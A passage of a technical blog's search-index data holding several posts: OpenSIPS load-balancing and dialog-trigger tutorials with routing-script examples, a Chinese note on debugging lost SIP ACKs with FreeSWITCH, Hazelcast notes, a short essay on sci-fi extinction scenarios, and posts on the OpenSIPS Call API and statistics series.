OpenSIPS when the maximum capacity of a destination changed (like a GW with more or less E1 cards).\nThe \u0026ldquo;load-balancing\u0026rdquo; functionality comes to enhance the \u0026ldquo;dispatcher\u0026rdquo; one. The difference comes in having or not load information about the destinations where you are routing to:\nDispatcher has no load information - it just blindly forwards calls to the destinations based on a probabilistic dispersion logic. It gets no feedback about the load of the destination (like how many calls that were sent actually were established or how many are still going). Load-balancer is load driven - LB routing logic is based primary on the load information. The LB module is using the DIALOG module in order to keep trace of the load (ongoing calls). 2. Load Balancing - how it works When looking at the LB implementation in OpenSIPS, we have 3 aspects:\n2.1 Destination set A destination is defined by its address (a SIP URI) and its description as capacity.\nForm the LB module perspective, the destinations are not homogeneous - they are not alike; and not only from capacity point of view, but also from what kind of services/resources they offer. For example, you may have a set of Yate/Asterisk boxes for media-related services -some of them are doing transcoding, other voicemail or conference, other simple announcement , other PSTN termination. But you may have mixed boxes - one box may do PSTN and voicemail in the same time. So each destination from the set may offer a different set of services/resources.\nSo, for each destination, the LB module defines the offered resources, and for each resource, it defines the capacity / maximum load as number of concurrent calls the destination can handle for that resource.\nExample: 4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN id group_id dst_uri resources 1 1 sip:yate1.mycluster.net transc=30; pstn=32 2 1 sip:yate2.mycluster.net vm=100; transc=10 3 1 sip:yate3.mycluster.net vm=50; conf=300 4 1 sip:yate4.mycluster.net vm=10;conf=10;transc=10;pstn=32 For runtime, the LB module provides MI commands for:\nreloading the definition of destination sets changing the capacity for a resource for a destination 2.2 Invoking Load-balancing Using the LB functionality is very simple - you just have to pass to the LB module what kind of resources the call requires.\nThe resource detection is done in the OpenSIPS routing script, based on whatever information is appropriated. For example, looking at the RURI (dialed number) you can see if the call must go to PSTN or if it a voicemail or conference number; also, by looking at the codecs advertised in the SDP, you can figure out if transcoding is or not also required.\nif (!load_balance(\u0026#34;1\u0026#34;,\u0026#34;transc;pstn\u0026#34;)) { sl_send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } The first parameter of the function identifies the LB set to be used (see the group_id column in the above DB snapshot). Second parameter is list of the required resource for the call. A third optional parameter my be passed to instruct the LB engine on how to estimate the load - in absolute value (how many channels are used) or in relative value (how many percentages are used).\nThe load_balance() will automatically create the dialog state for the call (in order to monitor it) and will also allocate the requested resources for it (from the selected box).\nThe function will set as destination URI ($du) the address of the selected destination/box.\nThe resources will be automatically released when the call terminates.The LB module provides an MI function that allows the admin to inspect the current load over the destinations.\n2.3 The LB logic The logic used by the LB module to select the destination is:\ngets the destination set based on the group_id (first parameter of the load_balance() function) selects from the set only the destinations that are able to provide the requested resources (second parameter of the load_balance() function) for the selected destinations, it evaluated the current load for each requested resource the winning destination is the one with the biggest value for the minimum available load per resources. Example:\n4 destinations/boxes in the LB set\noffers 30 channels for transcoding and 32 for PSTN offers 100 voicemail channels and 10 for transcoding offers 50 voicemail channels and 300 for conference offers 10 voicemail, 10 conference, 10 transcoding and 32 PSTN when calling load_balance(\u0026ldquo;1\u0026rdquo;,\u0026ldquo;transc;pstn\u0026rdquo;) -\u0026gt;\nonly boxes (1) and (4) will be selected at as they offer both transcoding and pstn evaluating the load : (1) transcoding - 10 channels used; PSTN - 18 used (4) transcoding - 9 channels used; PSTN - 16 used evaluating available load (capacity-load) : - (1) transcoding - 20 channels used; PSTN - 14 used - (4) transcoding - 1 channels used; PSTN - 16 used for each box, the minimum available load (through all resources) (1) 14 (PSTN) (2) 1 (transcoding) final selected box in (1) as it has the the biggest (=14) available load for the most loaded resource.\nThe selection algorithm tries to avoid the intensive usage of a resource per box.\n2.4 Disabling and Pinging The Load Balancer modules provides couple of functionalities to help in dealing with failures of the destinations. The actual detection of a failed destination (based on the SIP traffic) is done in the OpenSIPS routing script by looking at the codes of the replies you receive back from the destinations (see the example at the end of tutorial).Once a destination is detected at failed, in script, you can mark it as disabled via the lb_disable() function - once marked as disabled, the destination will not be used anymore in the LB process (it will not be considered a possible destination when routing calls).For a destination to be set back as enabled, there are two options:\nuse the MI command lb_status to do it manually, from outside OpenSIPS based on probing - the destination must have the SIP probing/pinging enabled - once the destination starts replying with 200 OK replies to the SIP pings (see the probing_reply_codes option. To enable pinging, you need first to set probing_interval to a non zero value - how often the pinging should be done. The pinging will be done by periodically sending a OPTIONS SIP request to the destination - see probing_method option.To control which and when a destination is pinged, there is the probe_mode column in the load_balancer table - see table definition. Possible options are:\n0 no pinging at any time 1 ping only if in disabled state (used for auto re-enabling of destinations) 2 ping all the time - it will disable destination if fails to answer to pings and enable it back when starts answering again. 2.5 RealTime Control over the Load Balancer The Load Balancer module provides several MI functions to allow you to do runtime changes and to get realtime information from it.Pushing changes at runtime:\nlb_reload - force reloading the entire configuration data from DB - see more.. lb_resize - change the capacity of a resource for a destination - see more.. lb_status - change the status of a destination (enable/disable) - see more.. For fetching realtime information :\nlb_list - list the load on all destinations (per resource) - see more.. lb_status - see the status of a destination (enable/disable) - see more.. 3. Study Case: routing the media gateways Here is the full configuration and script for performing LB between media peers.\n3.1 Configuration Let\u0026rsquo;s consider the following case: a cluster of media servers providing voicemail service and PSTN (in and out) service. So the boxes will be able to receive calls for Voicemail or for PSTN termination, but they will be able to send back calls only for PSTN inbound.\nWe also want the destinations to be disabled from script (when a failure is detected); The re-enabling of the destinations will be done based on pinging - we do pinging only when the destination is in \u0026ldquo;failed\u0026rdquo; status.\n4 destinations/boxes in the LB set\noffers 50 channels for voicemail and 32 for PSTN offers 100 voicemail channels offers 50 voicemail channels offers 10 voicemail and 64 PSTN This translated into the following setup:\nid group_id dst_uri resources prob_mode 1 1 sip:yate1.mycluster.net vm=50; pstn=32 1 2 1 sip:yate2.mycluster.net vm=100 1 3 1 sip:yate3.mycluster.net vm=50 1 4 1 sip:yate4.mycluster.net vm=10;pstn=64 1 3.2 OpenSIPS Scripting debug=1 memlog=1 fork=yes children=2 log_stderror=no log_facility=LOG_LOCAL0 disable_tcp=yes disable_dns_blacklist = yes auto_aliases=no check_via=no dns=off rev_dns=off listen=udp:xxx.xxx.xxx.xxx:5060 # REPLACE here with right values loadmodule \u0026#34;modules/maxfwd/maxfwd.so\u0026#34; loadmodule \u0026#34;modules/sl/sl.so\u0026#34; loadmodule \u0026#34;modules/db_mysql/db_mysql.so\u0026#34; loadmodule \u0026#34;modules/tm/tm.so\u0026#34; loadmodule \u0026#34;modules/uri/uri.so\u0026#34; loadmodule \u0026#34;modules/rr/rr.so\u0026#34; loadmodule \u0026#34;modules/dialog/dialog.so\u0026#34; loadmodule \u0026#34;modules/mi_fifo/mi_fifo.so\u0026#34; loadmodule \u0026#34;modules/mi_xmlrpc/mi_xmlrpc.so\u0026#34; loadmodule \u0026#34;modules/signaling/signaling.so\u0026#34; loadmodule \u0026#34;modules/textops/textops.so\u0026#34; loadmodule \u0026#34;modules/sipmsgops/sipmsgops.so\u0026#34; loadmodule \u0026#34;modules/load_balancer/load_balancer.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) modparam(\u0026#34;dialog\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) modparam(\u0026#34;rr\u0026#34;,\u0026#34;enable_double_rr\u0026#34;,1) modparam(\u0026#34;rr\u0026#34;,\u0026#34;append_fromtag\u0026#34;,1) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;,\u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # ping every 30 secs the failed destinations modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_interval\u0026#34;, 30) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_from\u0026#34;, \u0026#34;sip:pinger@LB_IP:LB_PORT\u0026#34;) # consider positive ping reply the 404 modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;probing_reply_codes\u0026#34;, \u0026#34;404\u0026#34;) route{ if (!mf_process_maxfwd_header(\u0026#34;3\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;looping\u0026#34;); exit; } if ( has_totag() ) { # sequential request -\u0026gt; obey Route indication loose_route(); t_relay(); exit; } # handle cancel and re-transmissions if ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } # from now on we have only the initial requests if (!is_method(\u0026#34;INVITE\u0026#34;)) { send_reply(\u0026#34;405\u0026#34;,\u0026#34;Method Not Allowed\u0026#34;); exit; } # initial request record_route(); # not really necessary to create the dialog from script (as the # LB functions will do this for us automatically), but we do it # if we want to pass some flags to dialog (pinging, bye, etc) create_dialog(\u0026#34;B\u0026#34;); # check the direction of call if ( lb_is_destination(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;) ) { # call comes from our cluster, so it is an PSNT inbound call # mark it as load on the corresponding destination lb_count_call(\u0026#34;$si\u0026#34;,\u0026#34;$sp\u0026#34;,\u0026#34;1\u0026#34;, \u0026#34;pstn\u0026#34;); # and route is to our main sip server to send call to end user $du = \u0026#34;sip:PROXY_IP:PORXY_PORT\u0026#34;; # REPLACE here with right values t_relay(); exit; } # detect resources and store in an AVP if ( $rU=~\u0026#34;^VM_\u0026#34; ) { # looks like a VoiceMail call $avp(lb_res) = \u0026#34;vm\u0026#34;; } else if ( $rU=~\u0026#34;^[0-9]+$\u0026#34; ) { # PSTN call $avp(lb_res) = \u0026#34;pstn\u0026#34;; } else { send_reply(\u0026#34;404\u0026#34;,\u0026#34;Destination not found\u0026#34;); exit; } # LB function returns negative if no suitable destination (for requested resources) is found, # or if all destinations are full if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;Selected destination is: $du\\n\u0026#34;); # arm a failure route for be able to catch a failure event and to do # failover to the next available destination t_on_failure(\u0026#34;LB_failed\u0026#34;); # send it out if (!t_relay()) { sl_reply_error(); } } failure_route[LB_failed] { # skip if call was canceled if (t_was_cancelled()) { exit; } # was a destination failure ? (we do not want to do failover # if it was a call setup failure, so we look for 500 and 600 # class replied and for local timeouts) if ( t_check_status(\u0026#34;[56][0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;) ) ) { # this is a case for failover xlog(\u0026#34;REPORT: LB destination $du failed with code $T_reply_code\\n\u0026#34;); # mark failed destination as disabled lb_disable(); # try to re-route to next available destination if ( !load_balance(\u0026#34;1\u0026#34;,\u0026#34;$avp(lb_res)\u0026#34;) ) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Service full\u0026#34;); exit; } xlog(\u0026#34;REPORT: re-routing call to $du \\n\u0026#34;); t_relay(); } } ","permalink":"https://wdd.js.org/opensips/blog/load-balance/","summary":"https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9\n1. Load Balancing in OpenSIPS The \u0026ldquo;load-balancing\u0026rdquo; module comes to provide traffic routing based on load. Shortly, when OpenSIPS routes calls to a set of destinations, it is able to keep the load status (as number of ongoing calls) of each destination and to choose to route to the less loaded destination (at that moment). OpenSIPS is aware of the capacity of each destination - it is pre-configured with the maximum load accepted by the destinations.","title":"Load Balancing in OpenSIPS"},{"content":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我有仔细的分析了一下SIP转包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这是我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的var.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误的使用了fix_nated_contact。**务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contaced。对于这个请求的响应,则不需要进行nat处理。\n深入思考一下,为什么concact头修改的错了,往往ack就会有问题呢? 实际上ack请求的url部分,就是由响应消息的contact头的ulr部分。\n","permalink":"https://wdd.js.org/opensips/ch7/miss-ack/","summary":"通过sngrep抓包发现,通话正常,ACK无法送到FS。导致通话一段时间后,FS因为没有收到ACK,就发送了BYE来挂断呼叫。\nsngrep定位到问题可能出在OpenSIPS上,然后分析opensips的日志。\nMar 9 16:58:00 dd opensips[84]: ERROR:dialog:dlg_validate_dialog: failed to validate remote contact: dlg=[sip:9999@192.168.2.161:5080;transport=udp] , req =[sip:192.168.2.109:18627;lr;ftag=CX3CDinLARXn1ZRNIlPaFexgirQczdr7;did=4c1.a9657441] 上面的日志,提示问题出在dialog验证上,dialog验证失败的原因可能与contact头有关。\n然后我有仔细的分析了一下SIP转包。发现contact中的ip地址192.168.2.161并不是fs的地址。但是它为什么会出现在fs回的200ok中呢?\n这是我就想起了fs vars.xml,其中有几个参数是用来配置服务器的ip地址的。\n由于我的fs是个树莓派,ip是自动分配的,重启之后,可能获取了新的ip。但是老的ip地址,还是存在于vars.xml中。\n然后我就去排查了一下fs的var.xml, 发现下面三个参数都是192.168.2.161, 但是实际上树莓派的地址已经不是这个了。\nbind_server_ip external_rtp_ip external_sip_ip 解决方案:改变fs vars.xml中的地址配置信息,然后重启fs。\n除了fs的原因,还有一部分原因可能是错误的使用了fix_nated_contact。**务必记住:对于位于边界的SIP服务器来说,对于进入的SIP请求,一般需要fix_nated_contaced。对于这个请求的响应,则不需要进行nat处理。\n深入思考一下,为什么concact头修改的错了,往往ack就会有问题呢? 实际上ack请求的url部分,就是由响应消息的contact头的ulr部分。","title":"ACK 无法正常送到FS"},{"content":"","permalink":"https://wdd.js.org/posts/2021/03/ewinve/","summary":"","title":"stompjs 心跳机制调研"},{"content":"IDMG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data. With all relevant information in RAM in an IMDG, there is no need to traverse a network to remote storage for transaction processing. The difference in speed is significant – minutes vs. sub-millisecond response times for complex transactions done millions of times per second.\n参考 https://hazelcast.com/products/imdg/ 管理中心 https://github.com/hazelcast/management-center-docker https://github.com/hazelcast/hazelcast-docker https://github.com/hazelcast/hazelcast-nodejs-client/blob/master/DOCUMENTATION.md https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html 文档 https://docs.hazelcast.com/imdg/latest/clusters/discovering-by-tcp.html ","permalink":"https://wdd.js.org/posts/2021/02/xlwnvv/","summary":"IDMG是 IN-MEMORY DATA GRID的缩写。\n官方的一句话介绍:\nThe industry\u0026rsquo;s fastest, most scalable in-memory data grid, where speed, scalability and continuous processing are the core requirements for deployment.\n抽取关键词:\n快 可伸缩 内存 分布式 简介 An IMDG (in-memory data grid) is a set of networked/clustered computers that pool together their random access memory (RAM) to let applications share data structures with other applications running in the cluster.\nThe primary advantage is speed, which has become critical in an environment with billions of mobile, IoT devices and other sources continuously streaming data.","title":"hazelcast IDMG"},{"content":"","permalink":"https://wdd.js.org/posts/2021/02/egkbht/","summary":"","title":"macbook pro 1708 换电池记录"},{"content":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》来自日本作家高野和明的科幻小说给出系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 于三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。\n","permalink":"https://wdd.js.org/posts/2021/02/ploder/","summary":"人类将以什么方式走向灭绝,很多科幻电影中都有过设想。\n最近读到一本书《人类灭绝》来自日本作家高野和明的科幻小说给出系统的介绍。小说中有一份报告,叫做《海斯曼报告》。\n下面表格中的1-5是报告中提到的人类灭绝方式,6-7是我自己添加。\n种类 类别 举例 相关电影,或者书籍 1 宇宙规模的灾难 小行星撞地球,太阳燃尽 2 地球规模的环境变动 地球磁场的南北逆转现象,环境污染 《2012》《后天》 3 核战 二战 日本 核武器 4 疫病 病毒威胁 生物武器 电影生化危机,今年的新冠肺炎疫情,HIV 《生化危机》《行尸走肉》 5 人类进化 由于基因突变,产生更加智能的人类 《东京食尸鬼》《人类灭绝》 6 AI失控 人工智能出现自我意识 《我,机器人》《终结者系列》《黑客帝国系列》 7 外星人入侵 高层次文明入侵低层次文明 《三体》 于三体不同的是,作者从人类第5种可能性展开小说。如果你喜欢三体的话,《人类灭绝》这本小说,也是非常值得一读的。","title":"人类灭绝的7种方式"},{"content":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. By data we mean here dialog specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended be used for storing a lot of information during the calls).Let’s take a quick look at a couple of such scenarios:\nattended call transfer – the new call may need to import data (about the involved parties) from the old dialog; call parking – the retrieving call will need to import a lot of data (again, about the parties involved and the nature of the call) from the parked call call pickup – the picking up call will also have to access data from the ringing calls in order to find them, check permissions and grab one call. Scratching the surface, before OpenSIPS 3.1 The pre 3.1 OpenSIPS versions had some limited possibilities when comes to accessing the data from other dialogs.Historically speaking, the first attempt was the get_dialog_info() function, a quite primitive approach that allows you, using the dialog variables, to find a dialog and to retrieve from it only one dialog variable. Even so, this function served the purpose of addressing scenarios where you wanted to group dialogs around custom values – this solved the problem of a front-end OpenSIPS balancer trying to group all calls of a conf room on the same conf server, or trying to group the calls of a user on the same PBX (so call transfer will work).But there were some**_ limitations in terms of scalability_** (only one value was retrieved) and usage, on how the dialogs were referred (by dlg variables, not by the more natural call-id).So we had the next wave of functions that addressed that issues : the get_dialog_vals(), get_dialogs_by_val() or get_dialogs_by_profile() functions. They solved somehow the problem allowing a more versatile way of referring/identifying the dialogs and allowing a bulk access to the dialog data, but still, not all dialog data was accessible and the the way the data was returned (it complex arrays or json strings) makes them**_ difficult to use_**.\nThe true solution, with OpenSPIS 3.1 So back to the drawing board. And the correct solution to the problem (of inter dialog data accessing) come from a totally different, much simpler approach – give direct access to the dialog context, so every piece of dialog data will be accessible via the regular dialog functions/variables/profiles/flags/etc/.So, OpenSIPS 3.1 gives you the possibility to load the context of a different dialog, so you can retrieve whatever data without the need of additional functions or special data packing or re-formatting.Two simple functions were added, the load_dialog_ctx() and unload_dialog_ctx(). These two functions may be used to define a region in your script where “you see” a different dialog than the current one (dictated by the SIP traffic). Inside that region, all the dialog functions and variables will operate on the other dialog. Simple and very handy, right ?To make it even better, the OpenSIPS 3.1 gives you more than only the access to another dialog context – it gives you the possibility to**_ access the accounting context of another call_**. Shortly, you can access the accounting variables (extra data or per-leg data) of a different call – isn’t that cool ?This can be done via the acc_load_ctx_from_dlg() and acc_unload_ctx_from_dlg() functions, in the similar way to the loading/unloading the dialog context. Inside the region defined by these new accounting function, you will “see” the accounting data of another call.\nExample Let’s take the example of an attended transfer, when handling the transferring call. This snippet will show we can get access to various dialog and accounting data from the transferred dialog , while handling the transferring dialog.\n","permalink":"https://wdd.js.org/opensips/blog/cross-dialog-data/","summary":"原文:https://blog.opensips.org/2020/05/18/cross-dialog-data-accessing/\nThere are several calling scenarios – typical Class V – where multiple SIP dialogs may be involved. And to make it work, you need, from one dialog, to access the data that belongs to another dialog. By data we mean here dialog specific data, like dialog variables, profiles or flags, and, even more, accounting data (yes, the accounting engine is so powerful that it ended be used for storing a lot of information during the calls).","title":"Cross-dialog data accessing"},{"content":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more).So why not using the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support?For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated. The routes are optional and per-dialog and they give you the possibility to attach custom operations to the various critical milestones in a dialog life.While the on_answer and on_hangup routes are 100% data-manipulation oriented (you have full read/write access to the full data context of the dialog, but you cannot change anything about the dialog progress), the on_timeout route is a bit more versatile – by increasing the dialog’s timeout, you can dynamically increase the dialog lifetime (to postpone the dialog timeout, without waiting for any signalling to do it).But let’s talk example 🙂\nSimple PrePaid Using the on_timeout route, we can simulate the incremental check and charge behavior of a basic prepaid.For example, we set 5 seconds timeout for the dialog and when the on_timeout route is triggered (after the 5 secs), we can re-check if the caller still have credit to continue the call. If not, we leave the call to timeout, to be terminated by the OpenSIPS. If he still has credit, we deduct the cost for 5 secs more and we increase the dialog timeout is 5 more seconds. Simple, right ?\nroute { .... create_dialog(\u0026#34;B\u0026#34;); # remember some billing account id, to remember # where to check for credit $dlg_val(account_id) = \u0026#34;...\u0026#34;; # keep a running cost for the call also $dlg_val(total_cost) = 0; # start with an initial 5 seconds duration $DLG_tiemout = 5; t_on_timeout(\u0026#34;call_recheck\u0026#34;); t_on_hangup(\u0026#34;call_terminated\u0026#34;); .... } route[call_recheck] { # the dialog data (vars, flags, profiles) are accesible here. xlog(\u0026#34;[$DLG_id] dialog timeout triggered\\n\u0026#34;); # calculate the cost for the next 5 seconds $var(cost) = 5 * .... ; # use a critical/locked region to do test and update upon the credit get_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); if (avp_db_query(\u0026#34;select credit from accounts where credit\u0026gt;=$var(cost) and id=$dlg_val(account_id)\u0026#34;)) { # credit is stil available avp_db_query(\u0026#34;update accounts set credit=credit-$var(cost) where id=$dlg_val(account_id)\u0026#34;); # give the dialog 5 more seconds $DLG_timeout = 5; # update the total cost $dlg_val(total_cost) = $(dlg_val(total_cost){s.int}) + $var(cost); } else { # query returned nothing, so no credit is available, allow the call # to timeout and terminate right away } release_dynamic_lock( \u0026#34;$dlg_val(account_id)\u0026#34; ); } route[call_terminated] { # the dialog data (vars, flags, profiles) are accesible here. xlog(\u0026#34;[$DLG_id] call terminated after $DLG_lifetime seconds with a cost of $dlg_val(total_cost)\\n\u0026#34;); # IMPROVEMENT - eventually ajust the call if the call didn\u0026#39;t used # the whole span of the last 5 seconds } SHARE THIS: ","permalink":"https://wdd.js.org/opensips/blog/dialog-trigers/","summary":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more).So why not using the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support?For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated.","title":"Dialog triggers, or how to control the calls from script"},{"content":" 看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). In order to provide high performance throughput, the server has been developed in Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.0 requests and notifies.Although it runs as a standalone daemon able to control calls, it does not directly interact with SIP calls, but just communicates with a SIP proxy that actually provides the SIP stack and intermediates the calls. The first release of the Call API is using OpenSIPS for this purposes, but this is a loose requirement – in the future other SIP stacks can be used, with the appropriate connectors.\nArchitecture In terms of architecture, the new Call API tool consists of multiple units, the most important ones being:\nClients interface – this unit is responsible for receiving Json-RPC requests over WebSocket from clients and pass them to the Commands unit Management interface – this is the unit that communicates with the SIP proxy in order to instruct what needs to be done Event interface – listens for event from the SIP proxy and passes them to the Commands unit Commands unit – this is the unit that implements the commands logic, ensuring the interaction between all the above interfaces. Communication between these units is done asynchronous using go-routines. Below you can find a diagram that shows how all these units are interconnected\nDemo Below you can watch a video that shows how you can use some of the features the Call API tool provides, such as:\nStart a call between two participants Put the call on hold Resume the call from hold Transfer a call to a different destination Terminate an ongoing call Enjoy watching!\n","permalink":"https://wdd.js.org/opensips/blog/calls-manager/","summary":"看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). In order to provide high performance throughput, the server has been developed in Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.","title":"Calls management using the new Call API tool"},{"content":" 早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种时计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, that is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy to use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read. In other words, you cannot gather statistics only for a limited time frame.That is why starting with OpenSIPS 3.2, the statistics module was enhanced with a new type of statistics, namely statistics series, that allow you to provide custom stats accumulated over a specific time window (such as one second, one minute, one hour, etc.). When the stat is evaluated, only the values gathered within the specified time window is accounted, all the others are simply dropped (similar to a time-based circular buffer, or a sliding window). Using these new stats, you can easily provide standard statistics such as ACD, AST, PPT, ASR, NER, CCR in a per minute/hour fashion.\nProfiles In order to use the statistics series you first need to define a statistics profile, which describes certain properties of the statistics to be used, such as:\nthe duration of the time frame to be used – the number of seconds worth of data that should be accumulated for the statistics that use this profile; all data gathered outside of this time window is discarded the granularity of the time window – the number of slots used for each series – the more slots, the more accurate the statistic is, with a penalty of an increased memory footprint how to group statistics to make them easier to process the processing algorithm – or how data should be accumulated and interpreted when the statistic is evaluated; this is presented in the next chapter The profile needs to be specified every time data is pushed in a statistic series, so that the engine knows how to process it.\nAlgorithms The statistics series algorithm describe how the data gathered over the specified time window should be processed. There are several algorithms available:\naccumulate – this is useful when you want to count the number of times a specific event appears (such as number of requests, replies, dialogs, etc); for this algorithm, the statistic is represented as a simple counter that accumulates when data is fed, and is decreased when data (out of the sliding window) expires average – this is used to compute an average value over the entire window frame; this is useful to compute average call duration (ACD) or average post dial delay (PDD) over a specified time window percentage – used to compute the percentage of some data out of a total number of entries; useful to compute different types of ratios, such as Answer-seizure ratio (ASR), NER or CCR Usage The new functionality can be leveraged by defining one (or more) stat_series_profiles, and then feed data to that statistic according to your script’s logic using the update_stat_series() function. In order to evaluate the result of the stats, one can use the $stat() variable from within OpenSIPS’s script, or access it from outside using the get_statistics MI command.As a quick theoretical example, let us consider creating two statistics: one that counts the number of initial INVITE requests per minute your platform receives, and another one that shows the ratio of the INVITE requests out of all the other requests received.First, we shall define the two profiles that describe how the new statistics should be interpreted: the first one, should be a counter that accumulates all the initial INVITEs received in one minute, and the second one should be a percentage series, is incremented for initial INVITEs, and decremented for all the others. Both statistics series will use a 60s (one minute) window:modparam(\u0026ldquo;statistics\u0026rdquo;, \u0026ldquo;stat_series_profile\u0026rdquo;, \u0026ldquo;inv_acc_per_min: algorithm=accumulate window=60\u0026rdquo;)modparam(\u0026ldquo;statistics\u0026rdquo;, \u0026ldquo;stat_series_profile\u0026rdquo;, \u0026ldquo;inv_perc_per_min: algorithm=percentage window=60\u0026rdquo;)Now, in the main route, we shell update statistics with data:\u0026hellip;route { \u0026hellip; if (is_method(\u0026ldquo;INVITE\u0026rdquo;) \u0026amp;\u0026amp; has_totag()) { 